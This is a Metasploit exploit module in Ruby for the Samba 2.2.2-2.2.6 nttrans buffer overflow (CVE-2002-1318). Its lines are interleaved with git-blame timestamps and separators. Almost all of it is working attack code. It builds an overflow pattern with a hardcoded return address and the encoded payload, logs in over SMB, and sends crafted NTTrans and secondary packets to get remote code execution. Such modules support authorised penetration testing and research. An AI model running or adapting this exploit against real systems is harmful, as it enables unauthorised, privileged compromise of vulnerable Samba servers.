2007-02-18 00:10:39 +00:00
|
|
|
##
|
2017-07-24 06:26:21 -07:00
|
|
|
# This module requires Metasploit: https://metasploit.com/download
|
2013-10-15 13:50:46 -05:00
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
2007-02-18 00:10:39 +00:00
|
|
|
##
|
|
|
|
|
|
2016-03-08 14:02:44 +01:00
|
|
|
class MetasploitModule < Msf::Exploit::Remote
|
2009-12-06 05:50:37 +00:00
|
|
|
Rank = AverageRanking
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2015-02-13 17:17:59 -06:00
|
|
|
include Msf::Exploit::Remote::SMB::Client
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
def initialize(info = {})
|
2010-04-28 03:54:24 +00:00
|
|
|
super(update_info(info,
|
|
|
|
|
'Name' => 'Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow',
|
2006-11-28 17:18:43 +00:00
|
|
|
'Description' => %q{
|
2010-04-28 03:54:24 +00:00
|
|
|
This module attempts to exploit a buffer overflow vulnerability present in
|
|
|
|
|
versions 2.2.2 through 2.2.6 of Samba.
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2010-04-28 03:54:24 +00:00
|
|
|
The Samba developers report this as:
|
|
|
|
|
"Bug in the length checking for encrypted password change requests from clients."
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2010-04-28 03:54:24 +00:00
|
|
|
The bug was discovered and reported by the Debian Samba Maintainers.
|
2006-11-28 17:18:43 +00:00
|
|
|
},
|
|
|
|
|
'Author' => [ 'hdm' ],
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
2012-04-19 00:24:56 -05:00
|
|
|
[ 'CVE', '2002-1318' ],
|
2016-07-15 12:00:31 -05:00
|
|
|
[ 'OSVDB', '14525' ],
|
2012-04-19 00:24:56 -05:00
|
|
|
[ 'BID', '6210' ],
|
2010-04-28 03:54:24 +00:00
|
|
|
[ 'URL', 'http://www.samba.org/samba/history/samba-2.2.7a.html' ]
|
2006-11-28 17:18:43 +00:00
|
|
|
],
|
|
|
|
|
'Privileged' => true,
|
2013-11-20 15:08:13 -06:00
|
|
|
'Platform' => 'linux',
|
2006-11-28 17:18:43 +00:00
|
|
|
'Payload' =>
|
|
|
|
|
{
|
|
|
|
|
'Space' => 1024,
|
|
|
|
|
'BadChars' => "\x00",
|
|
|
|
|
'MinNops' => 512,
|
|
|
|
|
},
|
2010-04-28 03:54:24 +00:00
|
|
|
'Targets' =>
|
2006-11-28 17:18:43 +00:00
|
|
|
[
|
2010-04-28 03:54:24 +00:00
|
|
|
[ "Samba 2.2.x Linux x86",
|
2006-11-28 17:18:43 +00:00
|
|
|
{
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
'Platform' => 'linux',
|
|
|
|
|
'Rets' => [0x01020304, 0x41424344],
|
|
|
|
|
},
|
|
|
|
|
],
|
|
|
|
|
],
|
2020-10-02 17:38:06 +01:00
|
|
|
'DisclosureDate' => '2003-04-07'
|
2006-11-28 17:18:43 +00:00
|
|
|
))
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2010-04-28 03:54:24 +00:00
|
|
|
register_options(
|
|
|
|
|
[
|
|
|
|
|
Opt::RPORT(139)
|
2017-05-03 15:42:21 -05:00
|
|
|
])
|
2020-05-13 16:34:47 +02:00
|
|
|
|
|
|
|
|
deregister_options('SMB::ProtocolVersion')
|
2006-11-28 17:18:43 +00:00
|
|
|
end
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
def exploit
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
# 0x081fc968
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pattern = Rex::Text.pattern_create(12000)
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pattern[532, 4] = [0x81b847c].pack('V')
|
|
|
|
|
pattern[836, payload.encoded.length] = payload.encoded
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2010-04-28 03:54:24 +00:00
|
|
|
# 0x081b8138
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2020-05-13 16:34:47 +02:00
|
|
|
connect(versions: [1])
|
2006-11-28 17:18:43 +00:00
|
|
|
smb_login
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2010-04-28 03:54:24 +00:00
|
|
|
targ_address = 0xfffbb7d0
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
#
|
|
|
|
|
# Send a NTTrans request with ParameterCountTotal set to the buffer length
|
|
|
|
|
#
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
subcommand = 1
|
|
|
|
|
param = ''
|
|
|
|
|
body = ''
|
|
|
|
|
setup_count = 0
|
|
|
|
|
setup_data = ''
|
|
|
|
|
data = param + body
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pkt = CONST::SMB_NTTRANS_PKT.make_struct
|
|
|
|
|
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
base_offset = pkt.to_s.length + (setup_count * 2) - 4
|
|
|
|
|
param_offset = base_offset
|
|
|
|
|
data_offset = param_offset + param.length
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT
|
|
|
|
|
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
|
|
|
|
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
|
|
|
|
|
pkt['Payload']['SMB'].v['WordCount'] = 19 + setup_count
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pkt['Payload'].v['ParamCountTotal'] =12000
|
|
|
|
|
pkt['Payload'].v['DataCountTotal'] = body.length
|
|
|
|
|
pkt['Payload'].v['ParamCountMax'] = 1024
|
|
|
|
|
pkt['Payload'].v['DataCountMax'] = 65504
|
|
|
|
|
pkt['Payload'].v['ParamCount'] = param.length
|
|
|
|
|
pkt['Payload'].v['ParamOffset'] = param_offset
|
|
|
|
|
pkt['Payload'].v['DataCount'] = body.length
|
|
|
|
|
pkt['Payload'].v['DataOffset'] = data_offset
|
|
|
|
|
pkt['Payload'].v['SetupCount'] = setup_count
|
|
|
|
|
pkt['Payload'].v['SetupData'] = setup_data
|
|
|
|
|
pkt['Payload'].v['Subcommand'] = subcommand
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pkt['Payload'].v['Payload'] = data
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
self.simple.client.smb_send(pkt.to_s)
|
|
|
|
|
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT)
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
#
|
|
|
|
|
# Send a NTTrans secondary request with the magic displacement
|
|
|
|
|
#
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
param = pattern
|
|
|
|
|
body = ''
|
|
|
|
|
data = param + body
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct
|
|
|
|
|
self.simple.client.smb_defaults(pkt['Payload']['SMB'])
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
base_offset = pkt.to_s.length - 4
|
|
|
|
|
param_offset = base_offset
|
|
|
|
|
data_offset = param_offset + param.length
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY
|
|
|
|
|
pkt['Payload']['SMB'].v['Flags1'] = 0x18
|
|
|
|
|
pkt['Payload']['SMB'].v['Flags2'] = 0x2001
|
|
|
|
|
pkt['Payload']['SMB'].v['WordCount'] = 18
|
2013-08-30 16:28:54 -05:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pkt['Payload'].v['ParamCountTotal'] = param.length
|
|
|
|
|
pkt['Payload'].v['DataCountTotal'] = body.length
|
|
|
|
|
pkt['Payload'].v['ParamCount'] = param.length
|
|
|
|
|
pkt['Payload'].v['ParamOffset'] = param_offset
|
|
|
|
|
pkt['Payload'].v['ParamDisplace'] = targ_address
|
|
|
|
|
pkt['Payload'].v['DataCount'] = body.length
|
|
|
|
|
pkt['Payload'].v['DataOffset'] = data_offset
|
2010-04-28 03:54:24 +00:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
pkt['Payload'].v['Payload'] = data
|
2010-04-28 03:54:24 +00:00
|
|
|
|
2006-11-28 17:18:43 +00:00
|
|
|
self.simple.client.smb_send(pkt.to_s)
|
|
|
|
|
ack = self.simple.client.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
handler
|
|
|
|
|
|
|
|
|
|
end
|
2009-07-16 16:02:24 +00:00
|
|
|
end
|
